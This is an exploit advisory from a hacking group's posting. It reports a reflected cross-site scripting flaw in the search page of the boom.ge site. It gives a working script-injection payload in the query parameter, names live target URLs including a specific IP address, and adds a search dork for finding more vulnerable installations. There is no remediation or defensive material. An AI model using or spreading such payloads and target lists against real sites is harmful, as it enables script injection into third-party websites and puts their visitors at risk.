#######################################################################################
#                                                                                     #
# Exploit Title : boomge Search Cross Site Scripting Vulnerabilitiy                   #
#                                                                                     #
# Author        : Emperor-Team                                                        #
#                                                                                     #
# Discovered By : Am!r                                                                #
#                                                                                     #
# Home          : http://Emperor-Team.Org                                             #
#                                                                                     #
# Software Link : http://www.boom.ge                                                  #
#                                                                                     #
# Security Risk : High                                                                #
#                                                                                     #
# Version       : All Version                                                         #
#                                                                                     #
# Tested on     : GNU/Linux Ubuntu - Windows Server - win7                            #
#                                                                                     #
# Dork          : "boom ge"                                                           #
#                                                                                     #
#######################################################################################
#                                                                                     #
#  Expl0iTs :                                                                         #
#                                                                                     #
#  [TarGeT]/search.php?query="><script>alert(/amir/)</script>                         #
#                                                                                     #
#######################################################################################
#                                                                                     #
#  Demo:                                                                              #
#                                                                                     #
#  http://boom.ge/search.php?query=[Xss]                                              #
#                                                                                     #
#  http://91.208.144.132/~boomge/search.php?query=[Xss]                               #
#                                                                                     #
#                                                                                     #
#######################################################################################
#                                                                                     #
# Greats : Aria-Security.Com - Iranhack.Org - Zarbat.Org - datacoders.org -           #
#                                                                                     #
#          black-hg.org - Ashiyane.Org - And All Iranian Hackers                      #
#                                                                                     #
#######################################################################################